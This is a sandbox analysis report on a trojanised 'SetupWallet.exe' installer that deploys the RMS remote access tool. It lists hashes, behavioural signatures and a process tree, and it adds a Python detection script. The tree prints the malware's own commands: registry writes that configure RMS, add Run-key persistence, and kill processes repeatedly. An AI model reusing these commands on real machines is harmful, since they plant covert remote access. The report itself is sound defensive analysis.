Analysis

  • max time kernel
    162s
  • max time network
    171s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    17-03-2022 01:28

General

  • Target

    SetupWallet.exe

  • Size

    6.8MB

  • MD5

    5ed4af2f49c3a4766bd4094209a3a030

  • SHA1

    42d0072de6ed12bd605a0362cbe2330c69a93d88

  • SHA256

    65526a403bca2df4dbcbb9997a8d012d6910ffe02342d790e5209eeb339d1027

  • SHA512

    6f238ddb43316e3cc9352caab9103f447938d500db2fa5d074bbdc1d76958306839b6fed352517e9d5d4b861ac14dbb4bdd313c8b94a791b58208d2f328f26fe

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a commercial remote access tool developed by the Russian organization TektonIT. The software itself is legitimate; what makes this sample a remote access trojan is how it is deployed, as shown in the process tree below: the host binary (rutserv.exe) is dropped into C:\ProgramData, its configuration is written directly with reg.exe, and a Run key is added so it starts with the user's session.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox's signature text calls this likely ransomware behaviour, but it is a generic heuristic: no other signature in this report corroborates ransomware, and enumerating drives is also expected of a remote access tool that offers file transfer.

  • Program crash 1 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 64 IoCs
  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe
    "C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Users\Admin\AppData\Local\Temp\is-TQESB.tmp\SetupWallet.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-TQESB.tmp\SetupWallet.tmp" /SL5="$50040,6348230,780800,C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:3380
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\Immunity\install.cmd""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Windows\system32\reg.exe
          REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Host" /f /v "notification" /t REG_BINARY /d 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
          4⤵
            PID:4468
          • C:\Windows\system32\timeout.exe
            TIMEOUT /T 3
            4⤵
            • Delays execution with timeout.exe
            PID:3472
          • C:\ProgramData\Immunity\rutserv.exe
            "C:\ProgramData\Immunity\rutserv.exe"
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4520
            • C:\ProgramData\Immunity\rutserv.exe
              C:\ProgramData\Immunity\rutserv.exe -run_agent -second
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1916
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 768
              5⤵
              • Program crash
              PID:3060
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4484
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4732
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4876
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:360
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1180
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2404
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3208
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3680
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:220
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2208
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5108
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4684
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:844
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5116
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:816
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5024
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3448
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3852
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3564
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3876
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2304
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1836
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3940
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1712
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2124
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2652
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4344
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1476
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1656
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:744
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4064
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3336
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3484
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4088
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4080
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3764
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1472
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3476
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4140
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3472
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3292
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2068
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4228
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2972
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:368
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2388
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2976
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2544
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5108
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4836
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4440
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4988
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3948
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5024
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3448
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3852
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3564
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            PID:3876
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:2304
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            PID:1836
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:2424
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:2512
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:980
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:1104
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:3388
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            PID:992
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:3976
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:3104
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4316
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            PID:3528
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4208
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4084
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4412
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:1472
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:3464
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4856
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4864
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4896
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:2940
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            PID:3060
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4776
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            PID:2416
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:1736
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:3608
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:3504
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:2976
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:2208
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4684
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            PID:844
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4836
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4440
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:4988
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            PID:3948
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:5024
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:1852
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            PID:2028
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:1052
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:3876
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:2304
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            PID:1836
          • C:\Windows\system32\reg.exe
            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "serv" /t REG_SZ /d "C:\ProgramData\Immunity\rutserv.exe"
            4⤵
            • Adds Run key to start application
            PID:2128
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1504
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4520 -ip 4520
    1⤵
    PID:2628
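The install chain in the process tree above is what a detection engineer would want to catch in endpoint telemetry: the second-stage .tmp launched with /SL5= from an is-XXXXX.tmp directory (characteristic of an Inno Setup installer), cmd.exe running install.cmd, reg.exe writing the RMS host configuration, a burst of forced taskkill invocations against rundll32.exe, rutserv.exe started from C:\ProgramData\Immunity, and finally a Run value named "serv". The following Python is an added example, not part of the sandbox report or of any vendor product: it runs four rules over constructed Sysmon-style process-creation events modelled on this tree. PIDs, images and command lines follow the report; the timestamps, the parent of SetupWallet.exe (0, unknown), the twelve-event slice of the 64 taskkill children, the burst threshold and window, and the placeholder for the REG_BINARY data (elided in the report) are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon-style (Event ID 1) process-creation events modelled on the
# report's process tree. PIDs, images and command lines follow the report;
# timestamps, SetupWallet.exe's parent (0 = unknown) and the REG_BINARY data
# (elided in the report) are placeholders.
EVENTS = [
    {"ts": "2022-03-17T01:28:10", "pid": 2816, "ppid": 0,
     "image": r"C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe"'},
    {"ts": "2022-03-17T01:28:11", "pid": 3380, "ppid": 2816,
     "image": r"C:\Users\Admin\AppData\Local\Temp\is-TQESB.tmp\SetupWallet.tmp",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\is-TQESB.tmp\SetupWallet.tmp" '
                r'/SL5="$50040,6348230,780800,C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe"'},
    {"ts": "2022-03-17T01:28:14", "pid": 5004, "ppid": 3380,
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\Immunity\install.cmd""'},
    {"ts": "2022-03-17T01:28:14", "pid": 4468, "ppid": 5004,
     "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Host" '
                r'/f /v "notification" /t REG_BINARY /d <elided>'},
    {"ts": "2022-03-17T01:28:17", "pid": 4520, "ppid": 5004,
     "image": r"C:\ProgramData\Immunity\rutserv.exe",
     "cmdline": r'"C:\ProgramData\Immunity\rutserv.exe"'},
    {"ts": "2022-03-17T01:28:18", "pid": 1916, "ppid": 4520,
     "image": r"C:\ProgramData\Immunity\rutserv.exe",
     "cmdline": r"C:\ProgramData\Immunity\rutserv.exe -run_agent -second"},
]
# Twelve of the report's 64 taskkill children of cmd.exe, a few seconds apart.
EVENTS += [
    {"ts": f"2022-03-17T01:28:{20 + i // 4:02d}", "pid": 4000 + i, "ppid": 5004,
     "image": r"C:\Windows\system32\taskkill.exe",
     "cmdline": 'taskkill /f /im "rundll32.exe"'}
    for i in range(12)
]
EVENTS.append(
    {"ts": "2022-03-17T01:28:40", "pid": 2128, "ppid": 5004,
     "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" '
                r'/f /v "serv" /t REG_SZ /d "C:\ProgramData\Immunity\rutserv.exe"'})

# Directories a standard user can write to; binaries run from here deserve scrutiny.
USER_WRITABLE = re.compile(r"\\(ProgramData|Users\\[^\\]+\\AppData|Temp)\\", re.I)

def image_is(ev, name):
    return ev["image"].lower().endswith("\\" + name)

def rule_run_key(ev):
    """reg.exe adding a Run value whose data points into a user-writable directory."""
    cl = ev["cmdline"].lower()
    if not (image_is(ev, "reg.exe") and " add " in cl and "\\currentversion\\run" in cl):
        return None
    m = re.search(r'/d\s+"?([^"]+)', ev["cmdline"], re.I)
    return "Run key persistence -> " + m.group(1) if m and USER_WRITABLE.search(m.group(1)) else None

def rule_rms_config(ev):
    """Direct registry writes to the RMS host configuration (here the 'notification' value)."""
    if image_is(ev, "reg.exe") and "tektonit\\remote manipulator system" in ev["cmdline"].lower():
        return "RMS host configuration written via reg.exe"
    return None

def rule_rms_agent(ev):
    """rutserv.exe (the RMS host) started from a user-writable path instead of Program Files."""
    if image_is(ev, "rutserv.exe") and USER_WRITABLE.search(ev["image"]):
        return "RMS host started from " + ev["image"]
    return None

PER_EVENT_RULES = {"run_key_persistence": rule_run_key,
                   "rms_config_write": rule_rms_config,
                   "rms_agent_user_writable": rule_rms_agent}

def rule_taskkill_burst(events, threshold=5, window=timedelta(seconds=30)):
    """One parent spawning >= threshold forced taskkill.exe children inside `window`.
    threshold/window are assumed starting points, to be tuned per environment."""
    by_parent = defaultdict(list)
    for ev in events:
        if image_is(ev, "taskkill.exe") and "/f" in ev["cmdline"].lower():
            by_parent[ev["ppid"]].append(datetime.fromisoformat(ev["ts"]))
    findings = []
    for ppid, times in by_parent.items():
        times.sort()
        if any(times[i + threshold - 1] - times[i] <= window
               for i in range(len(times) - threshold + 1)):
            findings.append({"rule": "taskkill_burst", "pid": ppid,
                             "detail": f"{len(times)} forced taskkill children of PID {ppid}"})
    return findings

def detect(events):
    """Run every rule; returns a list of {rule, pid, detail} findings."""
    findings = []
    for ev in events:
        for name, rule in PER_EVENT_RULES.items():
            detail = rule(ev)
            if detail:
                findings.append({"rule": name, "pid": ev["pid"], "detail": detail})
    findings.extend(rule_taskkill_burst(events))
    return findings

def ancestry(events, pid):
    """Image basenames from `pid` up to the root: answers 'who launched this?' for a finding."""
    by_pid = {ev["pid"]: ev for ev in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"].rsplit("\\", 1)[-1])
        pid = by_pid[pid]["ppid"]
    return chain

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["rule"], f["pid"], f["detail"], " <- ".join(ancestry(EVENTS, f["pid"])))
```

Each finding carries the PID so the ancestry helper can tie it back to the installer; for the Run key write that chain is reg.exe <- cmd.exe <- SetupWallet.tmp <- SetupWallet.exe, which is the context an analyst needs before declaring the Run value malicious rather than a legitimate RMS deployment. The taskkill rule keys on the parent rather than the child so that the 64 short-lived processes in the report collapse into one alert.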

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1916-148-0x0000000001B10000-0x0000000001B11000-memory.dmp

    Filesize

    4KB

  • memory/2816-130-0x0000000000400000-0x00000000004CC000-memory.dmp

    Filesize

    816KB

  • memory/2816-132-0x0000000000400000-0x00000000004CC000-memory.dmp

    Filesize

    816KB

  • memory/3380-134-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

    Filesize

    4KB

  • memory/4520-137-0x0000000001850000-0x0000000001851000-memory.dmp

    Filesize

    4KB